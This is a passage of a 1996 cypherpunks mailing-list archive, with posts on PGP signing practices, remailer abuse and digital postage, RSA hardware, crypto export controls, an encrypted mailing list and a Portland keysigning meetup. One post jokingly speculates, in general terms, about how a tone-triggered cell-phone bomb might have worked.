iQCVAwUBMPcwgcVrTvyYOzAZAQGK7wP+JItfxqHI/JGIKjPu9Yy7v1gVJQJTK+Bh
hV/z4C22hoRweo1jnBrO47GSfjB3aJIrufPjzlm94sRyh/EM1AAGbFWEY/M30Oye
fEN6paETcrE6W7arxJPZJFm2IggWYNgNrqwxToA3ZLFmC/8Sv1gH0y7PqNHxjFbz
MEL/vQGpd54=
=Su5o
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geocities.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 13 Jan 1996 19:28:37 +0800
To: cypherpunks@toad.com
Subject: DEC AltaVista Closer To Commercialization  [NOISE]
Message-ID: <199601131120.MAA03187@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Digital's Samuel H. Fuller, VP of corporate research for Digital, 
and Alan Jennings, Digital's manager of advanced technology 
business development, also told Newsbytes that Alta Vista has 
"re-started its Web crawling," to add even more pages to the 
total of 60 million Web pages -- representing half of all 
pages on the Web -- that were already indexed by December 15, 
when the new "super spider" Web facility opened to the public.  

"And as Alta Vista took off as the fastest growing Web site, we 
have quadrupled the capacity of our AlphaServer 8400 system from 
two to eight processors, and doubled the memory," noted Fuller.  

This leaves a "factor of two headroom" in terms of both 
processing power and memory, meaning that a single 8400 system 
should be able to host and accommodate an index for the entire 
Web, the VP added. The Alta Vista site also uses a smaller Alpha 
server to house the "super spider" itself.  

As reported in Newsbytes on December 15, Jennings previously said 
that Alta Vista is able to search up to 2.5 million Web pages a 
day. Lycos, Alta Vista's closest competitor, had searched only 7 
million Web pages up to that time, and the World Wide Web Worm 
about 3 million Web pages, in comparison to Alta Vista's 60 
million pages, Newsbytes was told.  

Alta Vista's high search speeds are made possible by the ability 
of the super spider to algorithmically "breed" batches of smaller 
Web crawlers, together with the use of Alpha processing power and 
high-speed ATM (asynchronous transfer mode) networks, according 
to Jennings.  

Fuller and Jennings told Newsbytes this week that Digital is 
currently assessing Alta Vista usage patterns and the half dozen- 
or-so "business inquiries" received each day to decide where to 
take Alta Vista on a commercial basis.  

On Friday, December 15, Alta Vista received 300,000 hits, a 
number that grew to 600,000 on Monday, December 18, 1.5 million 
by Wednesday, December 20, and 2 million per day following the 
December holidays, according to Fuller.  

In earlier beta testing, some 10,000 users employed Alta Vista to 
look up references to themselves and their families, to locate old 
friends and college roommates, and to access market research, 
information about the Web, and facts about corporate travel 
destinations.  

Like their counterparts within Digital, many Web users among the 
public at large have been employing Alta Vista for genealogically 
search purposes, Jennings said.  

Alta Vista is also emerging as "a real solid research tool 
covering the breadth of the Web," he asserted. In addition to 
obtaining an index of all Web sites containing a specified search 
term, and being able to move to those sites through hotlinks, 
users can obtain "reasonably good information regarding the 
characteristics of Web sites," such as "how frequently (the sites) 
are referenced, and the number of pointers."  

You can also employ can also employ case-sensitive matches, and 
limit searches to titles or other specified sections of a 
document.  

Digital officials have been impressed by Web users' "ingenuity" 
in inventing applications for Alta Vista. One company, for 
example, wanted to get in touch with all other firms with links 
to its site, he illustrated.  

Upon learning that Alta Vista is able to search for URLs (user 
resource locators), or pointers, the user conducted a URL search, 
and then proceeded to send out a broadcast e-mail message over 
the Internet to all linked sites.  

Business inquiries, he reported, have fallen into three main 
categories: users who want to use Alta Vista internally, license 
the search engine, or advertise their goods and services on the 
Alta Vista home page.  

"We'll start to make decisions on these within the next 30 days, 
and by the end of the quarter, (the decisions) will be part of 
our general business plans," Jennings told Newsbytes.  

"Digital is inching toward decisions on what they're going to 
do," pointed out Jim Green, an analyst at Summit Strategies.  

"Clearly, this Web site has met with astounding success. Alta 
Vista lets you start to make sense of the Internet. It makes you 
think about exactly what you want, because it will give you 
everything," the analyst told Newsbytes.  

"I see Alta Vista as a very useful tool for competitive 
analysis," observed Greg Kline, director, Network Integration and 
Management Research, at the Business Research Group (BRG).  

"I think that as Digital gets closer to finalizing their plans, 
they'll be speaking more about Alta Vista's most sophisticated 
search capabilities. And as Web servers become the corporate 
infrastructure through the "IntraNet,' users will be seeing the 
need for a tool to index their information assets," Kline told 
Newsbytes. You can access the Alta Vista home page on the Web at 
http://www.digital.com .  

A.E.N.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sun, 14 Jan 1996 02:01:30 +0800
To: gnu@toad.com>
Subject: Re: Shimomura on BPF, NSA and Crypto
In-Reply-To: <9601130957.AA19298@toad.com>
Message-ID: <9601131747.AA11926@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Tsutomu has lots of glib rhetoric about how he just builds tools and
>they can be used for good or evil.  This tool is custom-designed for
>evil.  

Rubbish, it would allow me to do something I urgently need to do - measure the 
performance of the main internet links. This is presently very difficult to do 
since the berkley sockets provide no network performance information to the 
application layer.

What I need is a means of determining the fragmentation, packet delay, 
throttling rate etc etc. This is information avaliable in the Kernel but I don't 
know how to get at it. The packet filters would provide a means to monitor, 
Tsutomu's kit would do the job better.

The reason why I need this type of stuff is that a number of governments are 
asking how many T3 lines they need to string across the ocean to get into the 
Internet game. If hard figures are avaliable they can make the case to fund 
them. [No Libertarian flames about government subsidy please, I'm not 
interested]

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joseph Halstead <jhdeval@soho.ios.com>
Date: Sun, 14 Jan 1996 02:07:53 +0800
To: cypherpunks@toad.com
Subject: Mailing List
Message-ID: <30F7F0CC.2EE@soho.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


I would like to be included in your mailing list.

jhdeval@soho.ios.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 14 Jan 1996 05:38:04 +0800
To: cypherpunks@toad.com
Subject: RSA accellerators on ISA/PCI cards?
Message-ID: <Pine.SOL.3.91.960113125755.22437B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Does anybody have any recommendations for a good RSA accellerator 
available on an ISA/PCI card? I'm looking for something that can be used 
with numerous public/private keys, though the ability to have one 
tamperproof key would be a bonus.

Thanks
Simon
----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sun, 14 Jan 1996 03:18:14 +0800
To: cypherpunks@toad.com
Subject: Re: Digital postage and remailer abuse
Message-ID: <2.2.32.19960113070712.00680b1c@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:47 AM 01/13/96 -0800, Jonathon Blake <grafolog@netcom.com> wrote:
>
>On Sat, 13 Jan 1996, David K. Merriman wrote:
>
>> snailmail; particularly if the remailers were able to issue 'books' of
stamps.
>> It might even be possible to have each remailer issue Estamps (tm) of
>> different 'kinds', much as there are different postage stamp 'themes'.
>
>	I can see it now.  The 1997 Scott Standard Estamp Catalog:  
>	Remailers of the World.  
>
Or perhaps Famous Cypherpunks?

So maybe a bad example, but the analogy is quasi-valid :-)

>> Having different stamps from each remailer would also allow some means of
>> tracking spammers and rip-off artists ("hmmm. an 'Elvis' Estamp. That came
>> from hactic; let's see if they can tell us who they sold this book to.....")
>
>	OTOH, if hactic keeps records of who the stamps are sold to,
>	that sort of defeats the anonymous nature of the remailers.
>

Perhaps a little, but considering *why* Estamps would be used, I think it
would be an acceptable 'hazard'. Of course, it's not any kind of
requirement, simply a means of resolving a *significant* problem. Or not. :-)

Dave


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPc9h8VrTvyYOzAZAQHl0wP+LY/Lw9EzM8kH5Eyr7rLRzEFwKSmWIeTf
sElMTzxQbTyqXrmzI0nB43Dmx1Cpkb+8mSCFVnXwvZDQzrP8cFidYGlNF/hG00ig
d16+D6Le07YgO65pCngNhv11CLKtd/1GZf4r8YXZV7zbMcbslooUHt/mVWkl5zGT
AP0ssH0WAI4=
=TQ04
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geocities.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Sun, 14 Jan 1996 03:46:30 +0800
To: Rich Graves <llurch@Networking.Stanford.EDU>
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
In-Reply-To: <199601030407.UAA12551@comsec.com>
Message-ID: <199601131820.NAA14561@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> From: Rich Graves <llurch@Networking.Stanford.EDU>
> Newsgroups: netcraft.cypherpunks,alt.security.pgp,sci.crypt,mail.cypherpunks
> Date: Fri, 12 Jan 1996 02:04:13 -0800
> 
> An easy short-term partial solution would be to modify mailcrypt, bap, or
> whatever front end you use to automatically put the current date and (a
> shortened form of) the To: or Newsgroups: header into the PGP signature
> Comments: line. 

Well, I'm not much of an elisp hacker so I resorted to using perl, but
here's what I have.  This doesn't address the issue of automatically
verifying the headers in a message, but at least the headers are in
the message so that you can manually verify things when there may be a
problem.

David

--
#!/usr/local/bin/perl
#
# Put Header In Sig.
# This script copies mail headers into the body of a message
# before signing, so that your signed messages cannot be taken
# out of context.
#
# To use with mailcrypt, put something like the following in your
# .emacs file:
#
# (defun put-header-in-sig ()
#   (call-process-region
#    (point-min) (point-max)
#    "~/bin/phis"
#    nil
#    (current-buffer)
#    nil))
# (add-hook 'mc-pre-signature-hook 'put-header-in-sig)


while (<>) {
    last if /^--/;
    $header .= $_ unless /^(BCC|FCC):/;
    $date = 1 if /^Date:/i;
}

exit 0 unless $_;

$header = "Date: " . `date` . $header unless $date;
print $header, "\n";

while (<>) {}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@vishnu.alias.net>
Date: Sun, 14 Jan 1996 03:54:29 +0800
To: cypherpunks@toad.com
Subject: New Mailing List (encrypted)
Message-ID: <199601131942.NAA06288@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello everyone,

	I have installed PGPdomo on vishnu.alias.net. I've also
created a new mailing list that you can join if you wish. It's a
closed mailing list, so subscriptions must be approved. What makes
this mailing list different is that all submissions are encrypted and
all outbound messages are encrypted to the PGP key of the
recipient. This means you can discuss whatever you wish without fear
of discovery or retribution. The name of the mailing list is
cypher-list and it's home is vishnu.alias.net. The theme of the
mailing list is basically anything one might discuss about
cryptography, crypto-politics, remailers, government, Kevin Mitnick,
etc. It's kind of like cypherpunks but accepts a wider discussion
base. The difference is encryption. As mentioned above, the list is
handled in a secure fashion. I've included the help file for PGPdomo
below to assist in subscribing to the list. Here is the simplified for
for subscribing:

Send email to cypher-list-request@vishnu.alias.net

	In the body of the message specify:

subscribe cypher-list
[your PGP public key in ascii-armored format]

	You will be added to the mailing list and emailed the welcome
message.

	Here's the help file:

You have reached the J. P. and Associates "Majordomo" mailing list
manager, version 1.93.  This is a modified version of Majordomo 
1.93 that includes PGP support.  Majordomo's public key is
available at:

            ftp://vishnu.alias.net/pub/majordomo.pgp

Additionally, the public key for Majordomo@vishnu.alias.net can be found on
the PGP keyservers.

Majordomo@vishnu.alias.net will accept the following commands in clear-text 
(i.e no encryption): help; lists; info; and which.

All other clear-text commands must be sent to the specific list using 
the email address:
	 <listname>-request@vishnu.alias.net

Where <listname> is a valid listname without the <> characters.

In the description below, items contained in []'s are optional. When
providing the item, do not include the []'s around it.

It understands the following commands:

    subscribe <list> [<address>]
    [-----BEGIN PGP PUBLIC KEY BLOCK-----
    Version: 2.6.2
    
    mQCNAzBoq         Your PGP version 2.6.2          EKOUFKNl+Ytk+O
    QphsZ8zNU         compatible Public Key           u0SDZVbcTP7lt6
    mP+fZPdMq         in ASC format goes here         izFrag5L4ZAAUR
    tDxNYWpvc   use pgp -kxa my_pubkey.asc to create  pvcmRvbW9AaGF3
    d3cuaGEub3NkLm1pbD4=
    =l3kH
    -----END PGP PUBLIC KEY BLOCK-----]

	Subscribe yourself (or <address> if specified) to the named
<list>.  subscribe commands should always be sent in clear-text to
<listname>-request@vishnu.alias.net.  Only include your PGP public key for
PGP protected lists.  We prefer (but not require) 1024 bit key
lengths.  We reject Public keys with less than 512 bits.  If
subscribing to a PGP protected list, include contact information such
as DSN or commerial phone number.

    unsubscribe <list> [<address>]
	Unsubscribe yourself (or <address> if specified) from the named <list>.

    get <list> <filename>
        Get a file related to <list>.

    index <list>
        Return an index of files you can "get" for <list>.

    which [<address>]
	Find out which lists you (or <address> if specified) are on.

    who <list>
	Find out who is on the named <list>.

    info <list>
	Retrieve the general introductory information for the named <list>.

    lists
	Show the lists served by this Majordomo server.

    help
	Retrieve this message.

    end
	Stop processing commands (useful if your mailer adds a signature).

Commands should be sent in the body of an email message to 
<list>-request@vishnu.alias.net.

Commands in the "Subject:" are line NOT processed.

If you have any questions or problems, please contact
Majordomo-Owner@vishnu.alias.net@vishnu.alias.net.

Additional PGP information:

When submitting entries to a PGP protected list, please comply with
the following:

o encrypt the entire submission for Majordomo@vishnu.alias.net 
  (-e option of pgp)
o use Transport Armor (.asc, radix-64, the -a option of pgp)
o sign your submissions (-s option of pgp)
o use the linefeed conversion option (-t option of pgp)

'pgp -east submission Majordomo@vishnu.alias.net' where submission is your 
file should work nicely.

 John Perry - KG5RG - perry@vishnu.alias.net -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.alias.net
 PGP 2.62 key for perry@vishnu.alias.net is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPgLL6ghiWHnUu4JAQHB5gf/RAwOwOdFGNGLhdQUE1z4VrAl1jYb3efg
a/C9nEAIb59VKZ3IwbehBzYqUxSDSXoarPQldoHfcKBJxfJahfu5U+09mMBbZ9VT
WYnQ1+KQiltQmAP8hcOdOazs0JrlTTOQJxoX095T8ZInJ904OuXA+V3sd8Tg/Nyc
Id/yfyfOeXndULj4UJxLWCsVGHSwx+CCa5Ct7g/yHZPQf7QtOPkDKF33vfsrQ+0d
04KemYL6PYLXPuLcgnOT1FiKccqR/q5340mUJBfs2yz7bx9UwFkexKuu/rkFDeno
wTjvUavyPpvV17eCEQMDaUggW6hZbQz7C72NHQ8NPi2XG/QrOCZZhA==
=kKgj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 14 Jan 1996 03:53:40 +0800
To: zinc <zinc@zifi.genetics.utah.edu>
Subject: Re: PRZ grand jury - how about free accts for them...
In-Reply-To: <Pine.LNX.3.91.960112154344.4191D-100000@zifi.genetics.utah.edu>
Message-ID: <Pine.SUN.3.91.960113142104.12530N-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jan 1996, zinc wrote:
> 
> how can it be jury tampering if the jury has been disbanded?  

It can't.
> 
> i did not mean to influence an active grand jury, but to ask questions
> of one that had finished it's job.
> 
You can give them accounts, but they are still covered by their secrecy 
oath, so they can't answer questions about what the grand jury did (at 
least in most jurisdictions, YMMV).   This got very contraversial in the 
Rocky Flats case, where the grand jurors hired a lawyer to get permission 
to go public to complain about a failure to prosecute.  

I don't recall ever reading about the outcome of that case, so I can't 
report the result.  If the jurors had won, I would have expected to hear 
about it.  It may still be pending.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sun, 14 Jan 1996 05:42:10 +0800
To: e$@thumper.vmeng.com, abostick@netcom.com
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
In-Reply-To: <v02120d07ad1ceba57085@[199.0.65.105]>
Message-ID: <199601132129.OAA26992@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself ABostick <abostick@netcom.com> probably wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----

(BTW, it verified here.)

> 
> If "digital postage" is ever implemented, this sort of
> distributed-origin mailbomb-through-a-remailer would be stopped
> immediately.  All the messages that the horny net geeks send would
> necessarily contain the same postage stamp, and the remailer would
> notice this right away -- and throw away messages containing the used
> postage stamp.
> 
> One more motivation for e$-like digital postage for remailers.


Unfortunately this is not the case.  The perpetrator would
simply have to convince the horny net geeks to pay their own
postage.  In fact, it is *in general* impossible to have both
anonymity and prevention/control of mail-bombing.  Of course 
digital postage will help the problem somewhat by making the
bombers pay for it, and smarter filters on the recipient's end
will help, but in general it is a problem we are going to have
to live with if we want anonymity.


Regards,

Bryce

PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMPgkE/WZSllhfG25AQFRhwQAnA9teB4oKYONpvSe++VaFR8vqi8t2Zs3
pI+qNPrFMyejrL84Vtwo7GKagUJCabEIYXuZ69X39kDjs3tiRIGllT0cqq9Ijb9Q
pog4YklGDDSirnsgfYatkguRA2VWqNPr67hVyQ6KQLHTBHTnW5bfgWrwlT7PyxJ0
f9FOMrqrIPE=
=zd6Y
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Sun, 14 Jan 1996 03:41:30 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601131931.OAA05150@bsu-cs.bsu.edu>
MIME-Version: 1.0
Content-Type: text/plain




>      The U.S. Commerce Department will recommend easing 
>      export controls on encryption software after a study by 
>      the department and the National Security Agency found 
>      that American firms are being hurt.... 


Avoid the rush, start generating those 42 bit keys now!  And don't forget
tonight's victory celebration in Shimomura's hot tub!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sun, 14 Jan 1996 06:01:36 +0800
To: e$@thumper.vmeng.com, cypherpunks@toad.com
Subject: bad PGP signatures
In-Reply-To: <v02120d0aad1db01de3b4@[199.0.65.105]>
Message-ID: <199601132149.OAA28011@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Yet another bad PGP signature via e$pam.

Date: Sat, 13 Jan 1996 12:13:03 +0600
To: cypherpunks@toad.com
From: "David K. Merriman" <merriman@arn.net>
Subject: Re: Digital postage and remailer abuse


That's the third today (although the second was fixable by 
concatenating the Subject: onto one line.)  Would everyone 
please get into the habit of formatting their messages to be 
much less than 80 columns?  All Phil's travails are ill-
rewarded when we can't get basic clearsigning to work via 
mailing lists.  (Or if we don't bother to *use* clearsigning 
via mailing lists, but that is another topic...)


On a related subject, cpunks traffic recently alerted me to how
effective replay attacks can be against PGP.  Don't PGP
signatures include a time-stamp from the system clock?  I'm 
going to get into the habit of including a time-stamp in the
clear-text from now on.  (I have sent so many PGP-clearsigned
messages, and many of them quite short, that an attacker could
almost hold up my end of a conversation using them.  :-) )


Bryce

PGP sig follows


Sat Jan 13 14:48:23 MST 1996


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMPgoy/WZSllhfG25AQGGlgP9HhxLLpfrsyTBc8ed9jjToJnUOl37S+3z
8zac6FJXk+3dsKhXe2UhiKQrLDx6wIodvy+6DkpBNEEWuzkaVlRkZ9QFiDIuKkm2
ixc8HaZ6yJQLKg5NX19vStpwyQGsDx9tCVAM8BtEYXHuzVqb7AuANVmS/EJWd5js
yz+pz6COpxE=
=PzVY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Sun, 14 Jan 1996 05:16:37 +0800
To: cypherpunks@toad.com
Subject: Theory Question:  Why isn't RSA a 0-knowledge Proof
Message-ID: <9601132108.AA19991@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Simple question, why isn't the hard problem of proving that I know a secret
key (d) for a given (e,n) (public key and modulus) a zero-knowledge proof?
Is some amount of information leaked during challanges?
_______________________
Regards,               Is this true or only clever? -Augustine Birrell
Joseph Reagle          http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu         0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Vincenzetti <vince@dsi.unimi.it>
Date: Sun, 14 Jan 1996 00:32:42 +0800
To: cypherpunks@toad.com
Subject: Re: New! Improved!  CryptoLib 1.1 now available.
Message-ID: <199601131608.AA031019338@idea.sec.dsi.unimi.it>
MIME-Version: 1.0
Content-Type: text


> Announcing CryptoLib - Release 1.1              12/21/95
>    Jack Lacy, AT&T Bell Labs
> 
> CryptoLib is a portable and efficient library of primitives
> for building cryptographic applications.  It runs under most versions
> of Unix as well as DOS, Windows and Windows-NT (and 95).
>
> We are pleased to make CryptoLib source code available without charge
> to researchers and developers in the US and Canada.  (Because of export
> restrictions on cryptographic software, we are only able to make the
> software available within the US and Canada to US and Canadian citizens
> and US permanent residents.)

also available in Europe as:

	ftp://ftp.dsi.unimi.it/pub/security/crypt/math/cryptolib_1.1.tar.gz

Ciao,
David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 14 Jan 1996 11:09:29 +0800
To: cypherpunks@toad.com
Subject: [noise] The economics of super-stars - partial cite
Message-ID: <Pine.SOL.3.91.960113185520.22640A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


This came up at the bay area cyherpunks meeting - I haven't got the full 
citation, but the orignal paper was by Sherwin Rosen of the University of 
Chicago; it was published in 1981, under the title "The Economics of 
Superstars" - I think it might be in:


        TITLE: Studies in labor markets / edited by Sherwin Rosen.
        PUBLICATION: Chicago : University of Chicago Press, 1981.
        DESCRIPTION: ix, 395 p. ; 24 cm.
             SERIES: Conference report / Universities--National Bureau 
		    Committee  for Economic Research ; no. 31


Simon
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 
	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sun, 14 Jan 1996 04:09:49 +0800
To: cypherpunks@toad.com
Subject: Re: CelBomb
Message-ID: <v01510100ad1c7a62b5c1@[193.74.216.26]>
MIME-Version: 1.0
Content-Type: text/plain


>   Can anyone in IL, or elsewhere, report more on the head-job
>   of The Engineer:
>
I don't know beans about it, but I've never let that stop me before.

>   Any crypto used to authenticate the target for the boombox,
>   or to obscure links to the assassin?
>
>   How was the blast specifically targeted at him and not a
>   phone borrower?
>
>   How it was set off -- by user-dialing, remote control, some
>   other means?
>

Try this scenario.  Bomb in cell phone's trigger is activated by a tone,
say the DTMF tones for the numbers 8 and 6.

Assassin calls phone number, and performs the following authentication protocol:

"Hi, this is J.Random Assassin.  May I speak to Mr. Intended Victim Please?"
"Speaking."
"Message for youuuuuuuuuuu...." Beep  Boop

BOOM!!!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 14 Jan 1996 15:12:56 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: [noise] The economics of super-stars - partial cite
In-Reply-To: <199601140628.WAA23934@blob.best.net>
Message-ID: <Pine.ULT.3.91.960113224708.20241J-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[Token crypto relevance: there's some steganography in Mayta]

On Sat, 13 Jan 1996, James A. Donald wrote:

> At 09:55 PM 1/13/96 -0800, Rich Graves wrote:
> > Title refers to Sendero Luminoso, a particularly bizarre Maoist cult that 
> > has been brutally repressed by Fujimori in recent years.
> 
> Your use of the word "brutal" in this context is a little odd.  Since Sendero
> Luminoso are extraordinarily cruel terrorists and mass murderers, it is
> entirely proper and appropriate for Fujimoro to attempt to physically
> exterminate them.  Possibly what you meant to imply is that Fujimoro 
> failed to make adequate distinction between support for the political
> ideas of terrorists, and actual participation in terror.

No, I meant "brutal."

The word "brutal" is also clearly appropriate for Sendero, but I figured 
"bizarre Maoist cult" was sufficiently non-laudatory. I guess some people 
are into that kind of thing, though, so I'll add "brutal" in the future.

Eye for an eye. Thankfully, it's calmed down now that the most nasty folks
are either dead or educated by the experience. Peru moved on from
terrorism to the soap opera within the Fujimori family (his wife
threatened to run for President against him, was locked out of the house,
etc.)

Read anything from Mario Vargas Llosa for background. I'm told that his
novels are actually more accurate than his nonfiction because he doesn't
have to worry quite so much about specific people on both sides wanting to
kill him, since he doesn't name names. I've recommended La vida de
Alejandro Mayta to many a chardonnay revolutionary who thinks that Maoist
revolution is "cool," and the human reality check is good for those with 
a more authoritarian bent, too.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 14 Jan 1996 15:28:40 +0800
To: (Recipient list suppressed)
Subject: [Local] Portland Cypherpunks Meeting Update
Message-ID: <2.2.32.19960114071832.00849bc0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


There have been no changes to the time and date of the Portland
Cypherpunks meeting.  For those of you who have not seen the 
past notices of the meeting, here are the details:

Place:        The Habit Internet Cafe
              2633 S.E. 21st Av.
              Portland OR 97202
              SE 21st @ Clinton
              (503) 235-5321
              http://www.teleport.com/~habit/
Date:         January 20th, 1995
Time:         5:23pm (Discordian time)

Activities:   There will be a general discussion of assorted
              topics including planned projects of the various
              participants, a PGP key signing, and general
              socializing, among other things.

If you need instructions on how to get to the Habit, send mail
to alano@teleport.com or habit@teleport.com and I will send 
you directions.

It has been requested that cameras not be brought to the meeting
as some who are planning on attending would like to avoid having
their soul captured by the evil magic of the lens.

If you are planning on participating in the key signing (and you
do not have to if you do not want to), please follow these
instructions:

Send a copy of your public key (ascii armored) to
alano@teleport.com.  (This will also help me determine how many
people are planning on attending.) 

I will compile all of the keys into a keyring which will be
handed out on diskette.  (Please tell me the format you want the
disk in.  Nothing too exotic, (like IBM mainframe formats and 
the like) please.)  I can also e-mail the keyring to you as well.

I will hand out a list of the fingerprints of the keys on the
keyring.  At the meeting we will verify key fingerprints. When
you get home, you can then sign the keys at your leisure and 
mail them back to me.  I will then send them to the key servers
and the participants of the keysigning.

***PLEASE DO NOT BRING YOUR PRIVATE KEYRINGS TO THE MEETING***

For more information on keysignings, check out:

http://world.std.com/~franl/pgp/how-to-organize-keysigning.html

If you have any more questions, just send me e-mail at alano@teleport.com.

My public key is:

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAy9jYK0AAAEH/1nM2SOeaUJfF1iK+LlPEueZci3AIMDVDLGqjLStvwqKrD/g
8yKtw3oqrw3+bFsyW6EYAj1EFSRXO/9sFgbfQePOtyDoEHyx9jjROz+5zVmyAe4S
KJwtNzmjBk6xfseR+0v7uKYcWQ2YYy4IL2d5zuUe+7HqxY+Mhr0jiViHFVvbIdXW
3Bnlob/8oprNsXl7MOqCAGMoL8WN2VIXJVU07Jm5XhEHIHVPtID5PjxCV9yT/XNV
cJkSOi0/EYPG8EsCfwP8s8o1oVNya6mraDaIiAc/oPrwjb+XUrWiiELCBtInoy/8
wQYKq1GAmsnnCSk+2jTnNh7/WX195AI/e/fQJ5kABRG0H0FsYW4gT2xzZW4gPGFs
YW5vQHRlbGVwb3J0LmNvbT6JAJUDBRAw3hjmZMnrupLu9OkBAYdFA/9wFA/VwaSH
m46CADZNUaVuDPa6FJRIrI2cqZRxKS4Xo4mrYXfLlhDwWYRUPd65X2U32NAdO7WN
TuvZL1lKNnq5Jd5WMxdzL3GEcONqIKPPWe+xbZtzaQxtKbuU1V9DlipZb+iL48Ca
enhQKgYNnIiGtj5XxO/CLiSAbqju5z4pMokBFQMFEDBqUUXkAj9799AnmQEBvwQH
/00LtGsFDi8Cpv3/hAyXdHDpfrzTo/Cr4UZkf6yeQjm75RyWLG2Dst10P//y52F5
Ixl/H2LDecnmYsYxZ9ij0Js1DfQqL1iu37+0O70z9I966DMizNeJ05nBNTHFOJu9
YXiHYSfLdr8OgS8rU78b+SsMdx1cufO0B5jMlW2wK9eBnNQ/V1gIl8X5dWvp5L6f
nH0+g2eACPNs1TgFW9Z4Zh+cFMJPqIJ8x4LxQEqkC/174TzjM2KyDKJNMTBYeSCs
